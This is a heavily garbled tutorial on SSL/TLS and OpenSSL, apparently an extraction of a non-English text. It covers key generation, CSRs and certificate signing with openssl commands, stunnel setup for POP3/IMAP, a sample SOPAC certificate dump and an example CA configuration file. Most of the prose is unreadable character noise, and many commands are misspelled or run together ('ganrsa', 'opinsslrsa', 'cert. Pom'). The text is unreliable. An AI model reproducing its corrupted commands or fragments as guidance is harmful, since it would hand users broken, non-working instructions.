N 6 H- Y . … . " I . 0,<P ' N1, @ 7 !89 • & '7 !89 - 56) 'L ? < & -, , B 0A L3 0, & 6- 5 0 % / -, -, < T ' $7) Y 7 L3 , B % ? "@ -, Hash 5 6- , , ' & 0 < - 1E ,4), > 0 ' B ( u4 - 56 5 … 5 " L3 _ 1 E ( u4 ) ? ? 6( u4 Hash /? & ) 1 ?@ Hash + 6 u4 m .1 , < ? # Hash L3 , B ? 56 6 2#5 I , P. > ] < 7) Y Hash g P . -, ' > U 7 ), O / $, 6 ( u4 Hash ' ) 2 ), , ' " -, ' 0 < 6- 5 5!, B 1E " / 6- 5 ) F ) ( 4 n,L … ?@ b 6 L3 , B L. P! ?& ) < , h F n,L F n, L 0 @ F ? "@" - Y , , 1E 6 b F 6 Q 1/ < $ < ( E P! 5B ) 6 5! , B bP ( u4 n, L 0 6 - Y -, < (E 9 ,# c 5G %5! C 0 6- < ( E 6- ™Y/ 6- 4 •A) ) S n, L ( u4 , P 0 F L3 , B 2< ?@ h 5 ) ( u4 n, L +H ) A" F n,L d* , ,F - ()&B) ("c 6) #1 " ? 59 ?& h 5 5 5 0, N,# , A" ( u4 ,P n,L 6 0 -, ! 6 5! , B] , 6 T. 6 ? v ') 3 U) ? 2 4 i: N 1P 0, < 60, b 0 2 6 3 = D) , 6 2 " M, 6, 6 % # S , $? 
@ 6 - E" U) 6 ?@ U) ) _= B* 6 U) 0,< 5 ™Y/ 2 X YD) 6 %3 6 U) F 6 , ?@ -, 6 U) 6 S BB S " U) F 2 0_, , 6 U) - 4] … A W L* 2 ), - , P G< 2 3@ " 6 6 > )( % < 6 > 0 < Z> A 3 a SSL %•) 4 H- Y #P< ) TCP/IP % # ) 4 c c 6- TCP/IP %# ) 4 )T HTTP) LDAP) IMAP , 6% # ) 4 ) 0, < F SSL %# ) 4 …‹ %#< c" c ) 3 6 c" ,6 -" F SSL BH < -,6 l '%#< !89 ) , 5 E , ) F N& 2 T L SSL U) U) M 9) 5! , B ) 6 % BH 2 a SSL -, 6 U ) &'( P! " 0, 5 % 5! , B ,6 -" F -,<, 7 67 P [ … / ? 59 ) N& T U) a, ?# 2 9 ?56 SSL 0, @ ) R 4 ? # & % 5! 2 U #!] , 5 7 P [ SSL 2 `56œ_ ? 2 4 SSL , 6" ,6 # " - Y $ ) 6 ), & , , 0 U) 6 ,6 H 2 `560, 5 % 3 5! % H 6 ), BH 2 a SSL -" F ) / ? 59 & 1 U) 67 P[ 0, 5 , ,6 -" F U) ) ) &'( BH 2 a SSL 2 TL ) 0, 5 1P -,< & 7 ) SSL Record protocol a = G 6- SSL ( u4 1P $ 6( u4 2 %# ) 4 protocol SSL Handshake % # ) 4 " - Y - . & SSL 1P " M, 60, 5 SSL = G 9 P %# ) 4 0, ) ) U) a 0 ?@ M 9 ) 6 9 ) !89 K &F % # ) 4 ) " SSL % # ) 4 -, < % # 'SSL T ? ) U) " M ,6 U) b 6 ) 67 P [ N& N1O * 0, _ 3] ) U) <,B 5! , B , - Y U) < , B) 5! , B N& % " g@ SSL Handshake ( u4 5! , B " - Y <,B 3 ( u4 & U) SSL -" F ) B F 6 ) N & TL N& " 0,< A 3 G F " ? 59 ) 6) 5! , B G U) U & $ 6- ? )@ 67 P[ % < , 9P %# ) 4 P SSL % # ) 4 <,B K ,6, -" F ) E SSL $ 0,6 67 P [ N& " - Y SSL -,< 0, 5 P 4 N& 2t 5: 6 %# ) 4 " '2 0 œ, 5 7 P [ U) & " '2 0 , B 2 0,6 H- Y 0,< a, -,< - )@ " 83 9 %/ 2 'L - T $& " SSL * N1- Y SSL ^ P U) - 5< ) ) U) !89 N ) -,<, 1 0, 5 U) 3 6 U) 6 3 ) -)8! ,< Y T) B / ,< U) !89 & 6, " 0, 5 0, ) 6-, < T N& T L E ?# ) , b T T & !89 " - Y (8! , U) 7P [ ) 6 0, 5 0 ' N1 ( ') F )@ & ) -,< 1P T. & ) 6- 5! , B E T ) 0, 5 ,B -)8! 0, U) T 6, g - Y U) ) G œ, ,< 3 6 ) ,< - 5 3 TL 1 ) , . ,B & F) U) 1 ) . ,B ?@ -,< & 67 P[ 3 ) - 56 -,< Z> ( u4 U) , " - Y ?@ ) - ) 1 ) 67 P [ . 3 U) 6 A 3 L3 , B " ) ) 0, 5 U) 7 2 0, 5 , 5 ,1 1P SSL ? ?@ " - Y ? 59 T T9 B F, B 1 ) . , B" - Y T9 !89 0,< B F 2 `56œ < ( u4 . 2' & ) u" U) ? ) ) ) <,B N& , B 2 " - Y G -,< 1P 7 !89 0 B F, B B ) T 6( u4 ,6 \89 ) 9 P " '2' ? 
4 -, < & u4 B ) ( u4 U G F" % / U) œ,<, 6 3 & 0, 5 0,< 9P " '2 ' ? 4 , ' u4 U) & ) U) 0 SSL -,< <R V < G F " ? 59 ) B F , B ) -, & $? )@ SSL (5 & B F, B 2 " ) 0, 5 6, 2 G g ) $, - Y ,< - U) 5 3 TL , . ,B & 1 ) 9P " ' - Y 67 P[ U) 6 A 3 ) 3 6- ) 0, 5 U) L3 , B " ) 7 0, 5 , 5 ,1 B F, B 1 ) 1P SSL " ? B F ?@ " - Y ? 59 T T9 . , B" - Y T9 !89 0,< 2 `56a < ( u4 U) ? N& ) . 2' u" ) ) ) <,B N& , B 2 " - Y G -, < 1P 7 !89 GF 0 B F, B B 0, 5 T 0,< U) 6( u4 ,6 \89 ) 9P " '2' ? 4 0 , SSL -, < <R V < G F " ? 59 ) & u4 B ) -,< & ( u4 9P " '2' ? 4 $? )@ ' U u4 B F , B ) -, U) U) & B F, B 2 " ) - Y a ) 9 ?560 6 , ) T T 6 ) " , 6 " ) U) 3 6 " - Y U) ) SSL 6, SSL 6, P! ? " 0 Fv s B / +:H 6, 667 P [ U) &'( 0, 5 7 P [ U) U) ) ,< Y SSL 9P " ' ) &'( a, 6 ) SSL 9P " ' (5 & / a,< , 6 3 & 0, 5 " p B / % € 0, 5 ' P Qv 4 " 6 @ PG ) , @ ',< -,< —> A 3 6 0, 6€,< U) 2G 5! % H 6 12 0 6 3 5! % H 6 -, ( 2 0 3 1 & 6 U) ) , - )@ -, 6,<P 6 " ,G ) ), 6 & 6, # ) # ) #1 > " 6 7 !89 ) ,< - : -, < - Y ) , u 6 6 ) 1 5! , B @ : ) # ) #1 > ), ( & b ?@ > L3 , B 6 0,< ,6 * , ) ) 6 -,< +H ) ) U) ( #P < ?56 P Q l '7c (5 a (E * + " 6 2 " - Y 6, B E … CRL ) CSR $ 6 , ( u4 -, # & E SSL Shell n 9 " 0,< DSA ) DH $ RSA x.509 C GH ) openssl 7 # " - Y ? @ v 4 0,< ,6 * OpenSSL 0, ?@ ,6 * & > , , 5! , B " - Y -,< • 6 g 3 6 B / 2 € 0 2 & U) 1 ( 2 ), 0, 5 5! , B , TL 7 ), 6 @ " DN ,B' 1 -, @ 6 < 5 , -, 1SSL 0, 5 'X €, 6 " & 6) ), ?@ N & ), R4 3 5! % H 6 U) ), 6 N1 B ) TLS ) SSL E … P. … & )? U) ? … S/MIME -,< & 6( u4 , … a openssl " ) ) & … ' Openssl command [ command_opts ][ command_args ] 2G - #B 5! \ ,< Y? " – 0, - 56 N - 7 6 @" " - Y & 1/ 6 , ) ;! 2 0 < & U) ? passphrase 2 ? ) ) S F ( 5 ?, E , ) ) ?, < ? - Y 7 passout " (, " 6S 6 " passin R 10, < 0 < 6 , B2 < " passphrase ^ < F? 5 # &' >/ passphrase 5L ?# 2 " - Y 6 & " ' & b passphrase 5B 0 d* , < ? ) _ F) 3 passphrase ) )" ^ a " & ) 2 openssl 4? ! - Y passphrase 7 P! " …pass : passphrase 0 < 0 < - Y passphrase ?, 3 " 0 < - Y ? 
&56 9 ( 5 % < T) L3 , B 6) < ,< passphrase # ? 1/ 2 6 6 ) F ( N6 ] passout- passin S L3 , B -" , - 0, ) # " %P H 6 G ?, 2 0 Y 2 " ? L3 , B 2 " -,< , 1 2 , 3 % L3 , B 2 " - Y F ( N6 < - Y U ) 9 6 2 N M 9 " 0,<P - Y % H ?,< -, " 7 , M 9" 7 passphrase , ^ & ", 2 ( 5 x509 ) genrsa req , rsa " H P 10, $, , 1 CSR 2 U 3b 6 # 0 5 - Y ), 0 < > (E ? , 1 ( N60 < - < 2 0 6 4 PU ) 3 ' ) 0 ),G -,!" - Y ("c SSL ), 0 <- command ,G L3 , B , 5 T 2 < , - Y var :. u , " - env : var pathname % 'T) : " -file : pathname …passout ) …Passin & ) % ' " 0 < passphrase ?, 3 () ) ) passphrase ?, : " ) 3 T) : 0 < - Y passphrase ?, 3 , < number ?@ M G - 5< - Y F) 3 B'" -fd : number 0 < e 'j 4 & " #B 5! 2 < >G - 56 manual 7 .Y -, 3 , ) )" 9 0,< 5 stdin " - Y Passphrase - stdin " x509 ) rep , rsa , genrsa 7 7 2 0 < U4 ,G - 6 5 H iX @ T) , 0 6 F) @ a genres %# < 2 RSA B ( '0 ) L3 , B , 1 2 0,< " Openssl genrsa [-out filename] [-passout arg] [-des] [-des3] [-idea] [-f4] [-3] [-rand file (s)] [numbits] aT) , -out filename < < ?@ F) 3 L3 , B - Y F) 3 % '( & 2 " 0, < -idea − des3 -des & IDEA DES3, DES 0, - Y 6 & 6 d* < stdout N1" # " L3 , B ? -passout arg DES3, DES ? d* a, 0 N1" # " $ <- Y , B ? 0 < numbits 6 - Y & 2 " Šwp ?@ e Y 4 , , 1 passphrase ?), ) IDEA & F) 3 % 'passphrase ›, d* wqp‹ T 9 , BT 9 L3 , B " openssl genrsa - out rsakey. Pem 1024 ) DES3 N1 -, < & wqp‹ T 9 L3 , B a, " , 1 W 3 passphrase openssl ganrsa - out rsakey. Pem - passout pass : enter –pass-here-des 3 1024 a rsa ? 2 " - Y 6, B' , 0 u a,< 0) @ . 0 " %#< RSA 6, B % ,P N ' 2 , B ( '0 5 -,6 2 ' " 6, B , B =B* opinsslrsa[− inf orm PEM NET DER][−outformPEM NET DER][−in filename][− pa sin arg] [−out filename][− passoutarg][−sgckey][−des][−des3][−idea][idea][−text][−noout][− modulus] [−check][− pubin][− pubout] aT) , - inform NER, PEM , , NER, PEM? 
, d* , 2 G L3 , B ) )" F) 3 , B ) ), B % < - Y & 2 " ?@ paaaphrase , < -, < & & ' ) )% ' 0 < - passin arg d * ' PEM ?@ e Y 4 , 0,< DER 0 - infilename , ) ), B PEM ?@ e Y 4 , 0,< DER 0 - outform 2 G 6 & -, 3 ) ),B 0 < - out filename " 0, d* < , -,< < ?@ F) 3 L3 , B F) 3 , B B' - Y & 2 0 < - passout arg d * ?@ passphrase , < -, < & & F) 3 , B 0 < − des − des 3 − idea ? IDEA & DES, DES 6 0, - text 7 -, < , 1/ - noout F) 3 - Y -)8! 0, N1" # " L3 , B L3 , B ' F) 3 & - L3 , B 6,B'-,< , ( ' & 2 " Y 0, < 5 - modulus 0, 0, V4 6D F) 3 L3 , B 6,B' 6D , B modulus 5 H passphrase " Opnssl rsa –in inkey. Pem- passin file: pass- file- out outkey. Pem -, 3 , ) ) " passphrase] , & L3 , B " a_ < openssl rsa- in inkey. Pem –des3 out outkey. Pem a,6 ? L3 , B 7 . " openssl rsa-in inkey. Pem – text - noout a req , B, 1 ?@ " ? a,< , 60 < " %#< 2 - Y CSR , B ( '0 5 - Y & 2 " 6 ) L3 opensslrep[−inf otmPEM DER][−outformPEM[−in filename][− passinarg][−out filename] [− passoutarg][−text][−noot][−noout][−verify][− modulus][−new][−rand file(s)] [−nwkeyrsa: bits][−newkeydsa: fise][−nodes][−key filenane][−keyfotmPEM DER][−keyoutfilename][−[md5 sha1 md2 ]][−configfilename][−x509][−days n] [−asn1− kludge][−newhdr][−extensionssection][−reqextssection] aT) , -inform NER, PEM , , 0 -outform NET, , ) ),B F) 3 CSR 2 G PEM ?@ e Y 4 , 0,< DER d* CSR ) )" ) ) CSR , , % < & ) )% ' - Y ?@ paaaphrase , < -, < & & 2 7 -,< , 1/ -)8! 0, -noout -modulus F) 3 CSR 6 D F) 3 ' d* CSR 6,B' F) 3 6, B'-, < , ( ' & 2 " CSR %3 -, 3 ) ) CSR 0 < -text - ' PEM 0 < -passin arg ' PEM ?@ e Y 4 , 0,< DER , 0 -infilename " 2G 6 & & Y 0, < 5 6D 5!, B modulus 5 H 0, -new 7 !89 ) E < CSR 0 < - Y -, < d * _0 < -newkey rsa: bits CSR -keyout filename E ;! ' , –key & 2 " - Y ) )" & " , B " CSR & " ,1 ,B ,< -, ) PSA L3 , B 0, d* ,B 6 < < ?@ d* ] & 2 " - Y ,G Bits 0 < L3 , B B'( , -x509 E root 6 CSR < F ,1 & 2 d* & 2 " - Y 0 < -days n P! ?& n ,< -,< - Y –x509 6 & " 0, , 1 CSR a, L3 , B d* " - Y " openssl req - new- key key. Pem - out req. 
pem. a, , 1 ? &56 9 CSR ) L3 , B " openssl req - newkey rsa : 1024 – keyout key. Pem – out req. pem. a, , 1 ? &56 9 root 6 ) L3 , B " openssl req –x509- newkey rsa: 1024 – key. Pem- out cert. Pem. x509 B ( '0 < - Y 6 ), & b 6 a,< , 2 " " %#< 2 opensslx509[−informDERPEMNET][−outform DERPEMNET][−keyform DER PEM][−CAformDERPEM][−CAkeyform DERPEM][−infilename ][−outfilenam e] [−hash][−subject ][−issuer][−nameopt ][−enddate ][−purpose ] option][−email][−startdate [−dates][−modulus][− fingerpr int][−alias][−noout][−trustout ][−clrtrust ][−clrreject ] [−addtrust arg][−addreject arg][−daysn][−signkeyfilename ][−x509toreq][−req][−CAfilename ] [−CAkeyfilename ][−CAcreatese rial][−CAserialfilename ][−text][−C][−md2− md5 − shal − mdc2] [−clrext][−extfile][−extfilefilename ][−extensions section] a T) , - inform $PEM , , - outform $PEM , , ' NET F) 3 CSR 2 G ' PEM ?@ e Y 4 , 0,< DER 0 0, -, ) ) CSR 2 G PEM ?@ e Y 4 , 0,< DER 0 - in filename 6 & d* CSR , ) ) CSR 3 % < NET ) )% ' - Y & 2 " 0 < - out filename " 0, d* , CSR -,< < ?@ ) ) CSR ) )" B' - Y & 2 0 < - text 7 -, < , 1/ 0, - nooout CSR F) 3 CSR -)8! ' -, 3 F) 3 6, B' & - 6, B '-,< , ( ' & 2 " - Y 0, < 5 - modulus F) 3 6 5! , B modulus 5 H %3 0, - serial - hash 0, 0, - subject - issuer 6D F) 3 6D F) 3 0, 0, 6D 6 6 S/ 6D F) 3 6D F) 3 6 6D T - 5< ( hash , 6 ( -, S/ ( - email 6 D F) 3 6 S/ # ) #1 4h @ 0, - startdate 0, - enddate - dates 6D z) 3 0, 0, 6D z) 3 6D F) 3 - fingerprint 0, - signkey filename 6 > 6D F) 3 6 < E filename > v ) ), v 1E ;! ' v 6 6 root 6 ), > & 2 " - Y H L3 , B " - Y 0 < - keyfrom , , ) ) L3 , B PEM ?@ e Y 4 , ,< DER 0 - days n d* P! ?& n ,< -,< - Y –x509 6 % , PCSR - Y d* 6 –signkey 2 PEM & " 0, - x509toreq , B " 0, & ' & 2 -,< - L3 0 < - req -, 3 ) )? ! -, 3 ) ) 6 e Y 4 CSR 1/ & 2 " - Y 0 < 0 < - CA filename ? > 6 0 < - Cakey filename " ? - Caserial d* filename 4( " & nB G & 2 b 6 d* ), & 2 b 7 P ! % '2 ( 4 -)8! 
, 6 E ), < & 6CERTICATE T 0srl , - CA createserial d* > 0 < ), 6 - Y L3 , B < - Y ?@ - 5< ) / % ' e Y 4 , 0, & 6certificate T ^ 6 - 5< % ' filename - extfile filename , H ?@ 6extention - Y 0, - extentions sectio & 2 " W 3 extention 6 d* ? )&' 0 < a,6 ? 6 B' 7 !89 - Y " openssl x509 – in cert. Pom-noout-text a,6 ? 6 T - 5< " openssl x509 – in cert. Pom-noout-serial a,6 ? 6 S/ ( " openssl x509 – in cert. Pem – noout-subject a,6 ? 6 1E > " – fingerprint openssl x509 – in cert. Pem – noout % ,P DER a, ' PEM '" 6 " openssl x509 – in cert. Pem – inform PEM – out cert. Der-outform DER a, % ,P CSR 6 " openssl x509 –x509 toreq-in cert. Pom –out req. pem – signkey key. Pem a, % ,Proot 6 CSR " openssl x509 – req-in careq.pom-signkey key. Pem-out cacert.pom > 6 ), & L3 , B ) 6 " - Y CSR " a, openssl x509 –req – in req. pem – CA cacert. Pem – CA key key . pemCacreateserial F) 1/ ) SSL b a -,< & 7 !89 ? ) , #4 ? ! . ? @2 & " H ) ,< " , T) , " U4 - 1/ ) a 2 U) … ], 5 T # , U) 5 -, < - < Stunnel ) ) 6 F) 3 ' ), ,< 6 @ 9 ] ,< -, < & " ' - Y SSL Wrapper \ 2 0 E n 9 2, ? ) I 0_ IMAP ) 6 &'( 7Y SLL 5 SSL 1/ 2 " , ? SSl " - Y ?# 'X ?@ ) ' 6 &'( I 0 _Apache O) ) b' 1/ 2 7 !89 T 6U ) SSL 7 # ) ,< 0 & =B* ' a ' ) ) L3 , B L3 , B ,1 openssl genrsa – out key. Pim 1024 a CSR 0 L3 , B b ?@ ? > a 6 ' ), CSR ? & " - Y CSR ? " ,1 ' > openssl x509 – req – in csr. Pem – signkey key key. Pem – pem – out . pem – days 365 POP3 ) - 56 Stunnel &'( SSL " -,Y - . \ X " POP3 ) ?,< - 56 SSL " - Y a 2#5 n 9 ) 2<) 5 H2 < - iX Stunnel " 0 < - Y 7 4 @)- ,6 A a ' {{Š - 5 < 7 wwq - 5 < 7 4 H ) 6script 7 4" b , 7 !89 Stunnel -, < & 7 !89 2 ) , " 7 Y wwq - 5< 2 0, < A" 4 Stunnel-d995 –p/usr/ local/ssl/certs/stunnnel. Pem – r localhost: 110 U) , )" ' 7 -,< & 7 !89 Stunnel {{Š - 5< 7 4 " 2 0, F -, < & a !89 2 A" H 4 6Script 7 Stunnel-d995 –p /usr/local/ssl/certs/stunnel.pim-l/usr / sbin/imapd ) L3 , B % < S stunnel.pem c % ' , B " , G Stunnel.pem % ' 0, < 0,< < _ -, F) , & ) 7 13 : 6 ] ) ) W 3 L*< ¢ ^P 2 0, , — ) ? 
59 5 < ? 3 IE " , 6 6 , 5 '— " 5< - P< ?# !89 % < , : 56 6 0_ B # %. $ P! 7, $ % 5 h @ $ ( , 56$ - 5 > 7 !89 2 L*< 1 E hash % H 56 ? 4 ) H , > ) 5< '2 F T/ 6 ?@ S/ )h @ 5! , B % < 6 I " - Y ) 6 CA 0 5! - ›, ) > )- R , $O) CA ' 7 !89 7 )&B " 5< @ & L3 0 @^ 2 0, —L*< — 5< , 5 ) R 6 6 ) 1E N 2 2 `560 0,< $, - 5 ^P < ? 59 6 ], 7 !89 ) ), N c 5G 5< " €,< $, 6 ? 59 ) L3 —6 M 9 ?@ — › GH ) @ €, - › '2 ) - ) 6 " ,G & ) a Certificate ? I 6 5< 5! & 5 ' N 56 6 c 5G 0,< C 2 SSL (Certificate Authority) 6> 56 1% < a "7 —6 ¢ 2 * A)

CA.pl -newcert
(openssl req -config /etc/openssl.cnf -new -x509 -keyout newreq.pem \
    -out newreq.pem -days 365)

# b F 6 6 6 0 , ( 5 0, ? 59 % H g 5 <$ 1E u) j -,< > 3 6 0, ?@ 66 6 > " )% HC 8 -, < > $, T 6 6 ) > A 3 \ 2 " 6CA 6 a 6 6 2 " # " 5

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C=FJ, ST=Fiji, L=Suva, O=SOPAC, OU=ICT, CN=SOPAC Root CA/[email protected]
        Not Before: Nov 20 05:47:44 2001 GMT
        Not After : Nov 20 05:47:44 2002 GMT
        Subject: C=FJ, ST=Fiji, L=Suva, O=SOPAC, OU=ICT, CN=www.sopac.org/[email protected]
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
                    00:ba:54:2c:ab:88:74:aa:6b:35:a5:a9:c1:d0:5a:
                    9b:fb:6b:b5:71:bc:ef:d3:ab:15:cc:5b:75:73:36:
                    b8:01:d1:59:3f:c1:88:c0:33:91:04:f1:bf:1a:b4:
                    7a:c8:39:c2:89:1f:87:0f:91:19:81:09:46:0c:86:
                    08:d8:75:c4:6f:5a:98:4a:f9:f8:f7:38:24:fc:bd:
                    94:24:37:ab:f1:1c:d8:91:ee:fb:1b:9f:88:ba:25:
                    da:f6:21:7f:04:32:35:17:3d:36:1c:fb:b7:32:9e:
                    42:af:77:b6:25:1c:59:69:af:be:00:a1:f8:b0:1a:
                    6c:14:e2:ae:62:e7:6b:30:e9
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints:
                CA:FALSE
            Netscape Comment:
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier:
                FE:04:46:ED:A0:15:BE:C1:4B:59:03:F8:2D:0D:ED:2A:E0:ED:F9:2F
            X509v3 Authority Key Identifier:
                keyid:E6:12:7C:3D:A1:02:E5:BA:1F:DA:9E:37:BE:E3:45:3E:9B:AE:E5:A6
                DirName:/C=FJ/ST=Fiji/L=Suva/O=SOPAC/OU=ICT/CN=SOPAC Root CA/Email=administrator@
                serial:00
    Signature Algorithm: md5WithRSAEncryption
        34:8d:fb:65:0b:85:5b:e2:44:09:f0:55:31:3b:29:2b:f4:fd:
        aa:5f:db:b8:11:1a:c6:ab:33:67:59:c1:04:de:34:df:08:57:
        2e:c6:60:dc:f7:d4:e2:f1:73:97:57:23:50:02:63:fc:78:96:
        34:b3:ca:c4:1b:c5:4c:c8:16:69:bb:9c:4a:7e:00:19:48:62:
        e2:51:ab:3a:fa:fd:88:cd:e0:9d:ef:67:50:da:fe:4b:13:c5:
        0c:8c:fc:ad:6e:b5:ee:40:e3:fd:34:10:9f:ad:34:bd:db:06:
        ed:09:3d:f2:a6:81:22:63:16:dc:ae:33:0c:70:fd:0a:6c:af:
        bc:5a

nB G 5! , B 0 n: # " ? 59 ,B 6 T ?@ # 0, › 6 , B 0 B . " B . # ] < - Y 6 6 'X R & T -, '-,< , ?@ S/ b -, < -,< > ( 4 F 6 6 b' 2 0 <- , P! $ N 56 2 S/ 7 !89 F " , P & 6, B 2 & ' 56 ) / 6 )/ > ?
") 6 2 N %. - Y GF " , # 3 L3 L3 , B N 7 P ! 6- ) 6 6 , P) $, < R & ( 4b . , )_ L3 a OpenSSL , #4% '

#---Begin---
#
# OpenSSL example configuration file.
# This is mostly being used for generation of certificate requests.
#

RANDFILE = $ENV::HOME/.rnd
oid_file = $ENV::HOME/.oid
oid_section = new_oids

# To use this configuration file with the "-extfile" option of the
# "openssl x509" utility, name here the section containing the
# X.509v3 extensions to use:
# extensions =
# (Alternatively, use a configuration file that has only
# X.509v3 extensions in its main [= default] section.)

[ new_oids ]

# We can add new OIDs in here for use by 'ca' and 'req'.
# Add a simple OID like this:
# testoid1=1.2.3.4
# Or use config file substitution like this:
# testoid2=${testoid1}.5.6

####################################################################
[ ca ]
default_ca = CA_default            # The default ca section

####################################################################
[ CA_default ]

dir = /var/ssl                     # Where everything is kept
certs = $dir/certs                 # Where the issued certs are kept
crl_dir = $dir/crl                 # Where the issued crl are kept
database = $dir/index.txt          # database index file.
new_certs_dir = $dir/newcerts      # default place for new certs.

certificate = $dir/cacert.pem      # The CA certificate
serial = $dir/serial               # The current serial number
crl = $dir/crl.pem                 # The current CRL
private_key = $dir/private/cakey.pem # The private key
RANDFILE = $dir/private/.rand      # private random number file

x509_extensions = usr_cert         # The extentions to add to the cert

# Extensions to add to a CRL. Note: Netscape communicator chokes on V2 CRLs
# so this is commented out by default to leave a V1 CRL.
# crl_extensions = crl_ext

default_days = 365                 # how long to certify for
default_crl_days= 7                # how long before next CRL
default_md = sha1                  # which md to use.
preserve = no                      # keep passed DN ordering

# A few difference way of specifying how similar the request should look
# For type CA, the listed attributes must be the same, and the optional
# and supplied fields are just that :-)
policy = policy_match

# For the CA policy
[ policy_match ]
countryName = match
stateOrProvinceName = optional
localityName = match
organizationName = match
organizationalUnitName = optional
commonName = supplied
emailAddress = optional

# For the 'anything' policy
# At this point in time, you must list all acceptable 'object'
# types.
[ policy_anything ]
countryName = optional
stateOrProvinceName = optional
localityName = optional
organizationName = optional
organizationalUnitName = optional
commonName = supplied
emailAddress = optional

####################################################################
[ req ]
default_bits = 1024
default_keyfile = privkey.pem
distinguished_name = req_distinguished_name
attributes = req_attributes
default_md = sha1
x509_extensions = v3_ca            # The extentions to add to the self signed cert

# Passwords for private keys if not present they will be prompted for
# input_password = secret
# output_password = secret

# This sets a mask for permitted string types. There are several options.
# default: PrintableString, T61String, BMPString.
# pkix : PrintableString, BMPString.
# utf8only: only UTF8Strings.
# nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings).
# MASK:XXXX a literal mask value.
# WARNING: current versions of Netscape crash on BMPStrings or UTF8Strings
# so use this option with caution!
string_mask = nombstr

# req_extensions = v3_req # The extensions to add to a certificate request

[ req_distinguished_name ]
countryName = Country Name (2 letter code)
countryName_default = FJ
countryName_min = 2
countryName_max = 2

stateOrProvinceName = State or Province Name (full name)
stateOrProvinceName_default = Fiji

localityName = Locality Name (eg, city)
localityName_default = Suva

0.organizationName = Organization Name (eg, company)
0.organizationName_default = SOPAC

# we can do this but it is not needed normally :-)
#1.organizationName = Second Organization Name (eg, company)
#1.organizationName_default = World Wide Web Pty Ltd

organizationalUnitName = Organizational Unit Name (eg, section)
organizationalUnitName_default = ITU

commonName = Common Name (eg, YOUR name)
commonName_max = 64

emailAddress = Email Address
emailAddress_max = 40

# SET-ex3 = SET extension number 3

[ req_attributes ]
challengePassword = A challenge password
challengePassword_min = 4
challengePassword_max = 20

unstructuredName = An optional company name

[ usr_cert ]

# These extensions are added when 'ca' signs a request.

# This goes against PKIX guidelines but some CAs do it and some software
# requires this to avoid interpreting an end user certificate as a CA.

basicConstraints=CA:FALSE

# Here are some examples of the usage of nsCertType. If it is omitted
# the certificate can be used for anything *except* object signing.

# This is OK for an SSL server.
# nsCertType = server

# For an object signing certificate this would be used.
# nsCertType = objsign

# For normal client use this is typical
# nsCertType = client, email

# and for everything including object signing:
# nsCertType = client, email, objsign

# This is typical in keyUsage for a client certificate.
# keyUsage = nonRepudiation, digitalSignature, keyEncipherment

# This will be displayed in Netscape's comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"

# PKIX recommendations harmless if included in all certificates.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid,issuer:always

# This stuff is for subjectAltName and issuerAltname.
# Import the email address.
# subjectAltName=email:copy

# Copy subject details
# issuerAltName=issuer:copy

# This is the base URL for all others URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/

# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac-ca.crl

# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?

# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?

# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html

# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt

# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac-ca.crl

[ v3_ca ]

# Extensions for a typical CA

# PKIX recommendation.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid:always,issuer:always

# This is what PKIX recommends but some broken software chokes on critical
# extensions.
# basicConstraints = critical,CA:true

# So we do this instead.
basicConstraints = CA:true

# Key usage: this is typical for a CA certificate. However since it will
# prevent it being used as an test self-signed certificate it is best
# left out by default.
# keyUsage = cRLSign, keyCertSign

# Some might want this also
# nsCertType = sslCA, emailCA

# Include email address in subject alt name: another PKIX recommendation
# subjectAltName=email:copy

# Copy issuer details
# issuerAltName=issuer:copy

# RAW DER hex encoding of an extension: beware experts only!
# 1.2.3.5=RAW:02:03

# You can even override a supported extension:
# basicConstraints= critical, RAW:30:03:01:01:FF

# This will be displayed in Netscape's comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"

# This is the base URL for all others URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/

# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac-ca.crl

# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?

# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?

# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html

# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt

# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac-ca.crl

[ crl_ext ]

# CRL extensions.
# Only issuerAltName and authorityKeyIdentifier make any sense in a CRL.
# issuerAltName=issuer:copy
authorityKeyIdentifier=keyid:always,issuer:always

#----End----

a =B* a 6 _CA] 6 ,F 'X " ) 2 ) SL A) 6 ,

openssl x509 -in cacert.pem -out cacert.crt

